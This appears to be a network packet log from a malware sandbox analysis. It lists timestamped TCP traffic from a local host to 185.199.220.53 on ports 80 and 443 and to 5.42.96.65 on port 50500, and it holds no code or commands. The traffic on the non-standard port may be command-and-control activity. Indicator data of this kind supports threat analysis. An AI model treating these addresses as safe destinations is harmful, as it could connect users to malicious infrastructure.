                                                                        May 12, 2024 12:31:49.609455109 CEST8049719185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:49.609493017 CEST4971980192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.609522104 CEST4971980192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.610375881 CEST4971980192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.610743999 CEST4972080192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.909446001 CEST8049720185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:49.909538031 CEST4972080192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.910254002 CEST8049719185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:49.912662029 CEST4972080192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.211441994 CEST8049720185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:50.211469889 CEST8049720185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:50.211488962 CEST8049720185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:50.211524963 CEST4972080192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.211558104 CEST4972080192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.211925983 CEST4972080192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.212287903 CEST4972180192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.510443926 CEST8049720185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:50.516180038 CEST8049721185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:50.516264915 CEST4972180192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.516380072 CEST4972180192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:50.520025015 CEST49722443192.168.2.5185.199.220.53
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2024 12:31:50.520056963 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:50.520117044 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:50.520345926 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:50.520361900 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:50.820204973 CEST | 80 | 49721 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:50.820298910 CEST | 49721 | 80 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:51.127217054 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:51.127286911 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:51.142148018 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:51.142167091 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:51.142410040 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:51.142558098 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:51.143829107 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:51.188106060 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.150043964 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.153090000 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.153130054 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.157077074 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.448808908 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.448821068 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.448868990 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.448896885 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.448914051 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.448937893 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.448959112 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.449073076 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.449095964 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.449131012 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.449137926 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.449161053 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.449176073 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.449187994 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.449234009 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.747844934 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.747931004 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.747956991 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748136997 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748166084 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748193979 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748199940 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748212099 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748229980 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748233080 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748245001 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748266935 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748275995 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748284101 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748305082 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748321056 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748321056 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748330116 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:52.748347044 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:52.748369932 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.046715021 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.046739101 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.046865940 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.046899080 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047059059 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047080040 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047096014 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.047103882 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047147036 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.047167063 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.047251940 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047270060 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047324896 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.047331095 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047425032 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.047480106 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.047593117 CEST | 49722 | 443 | 192.168.2.5 | 185.199.220.53
May 12, 2024 12:31:53.047607899 CEST | 443 | 49722 | 185.199.220.53 | 192.168.2.5
May 12, 2024 12:31:53.562125921 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:53.933753967 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:53.976105928 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:53.979099989 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.296899080 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.342457056 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.418579102 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.619313002 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639252901 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639267921 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639288902 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639305115 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639313936 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639322042 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639337063 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639348984 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639357090 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639372110 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639384031 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639385939 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639404058 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639409065 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639420033 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639432907 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639436007 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639446974 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639456987 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639463902 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639477968 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639478922 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:54.639503002 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.639524937 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.793116093 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:54.835185051 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002381086 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002585888 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002599001 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002616882 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002640963 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002641916 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002680063 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002764940 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002778053 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002794981 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002800941 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002806902 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002823114 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002831936 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002836943 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002856016 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002861023 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002870083 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002887964 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002895117 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002902031 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002921104 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002924919 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002942085 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002954006 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002958059 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.002970934 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002986908 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.002998114 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.003001928 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003015995 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003024101 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.003032923 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003048897 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003051043 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.003062963 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003078938 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003087044 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.003101110 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003114939 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.003115892 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003132105 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003148079 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.003150940 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.003181934 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.156109095 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365632057 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365658998 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365677118 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365691900 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365708113 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365717888 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365726948 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365741968 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365745068 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365760088 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365762949 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365780115 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365796089 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365797043 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365811110 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365827084 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365834951 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365869045 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365914106 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365926981 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.365972996 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.365998983 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366012096 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366039038 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366385937 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366404057 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366420031 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366444111 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366555929 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366569042 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366588116 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366594076 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366600037 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366619110 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366631985 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366631985 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366650105 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366652966 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366663933 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366677046 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366683006 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366684914 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366689920 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366708040 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366719007 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366723061 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366725922 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366744041 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366750002 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366759062 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366775036 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366779089 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366789103 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366806030 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366811991 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366820097 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366836071 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366844893 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366868973 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366920948 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366933107 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366952896 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366964102 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.366969109 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366982937 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.366997957 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367007017 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367008924 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367014885 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367026091 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367048979 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367049932 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367064953 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367078066 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367079020 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367103100 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367116928 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367122889 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367134094 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367149115 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367151976 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367168903 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367180109 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367183924 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367201090 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367214918 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.367218971 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.367254019 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.729075909 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729124069 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729146004 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729161024 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729177952 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729197979 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.729240894 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.729376078 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729389906 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729412079 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729418039 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.729430914 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729441881 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.729445934 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729461908 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729473114 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729487896 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:55.729490042 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:55.729496956 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
                                                                        May 12, 2024 12:31:55.729504108 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729510069 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729531050 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729542017 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729547024 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729548931 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729556084 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729572058 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729581118 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729592085 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729593039 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729608059 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729623079 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729626894 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729646921 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729660988 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729660988 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729679108 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729690075 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729696035 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729711056 CEST50500497065.42.96.65192.168.2.5
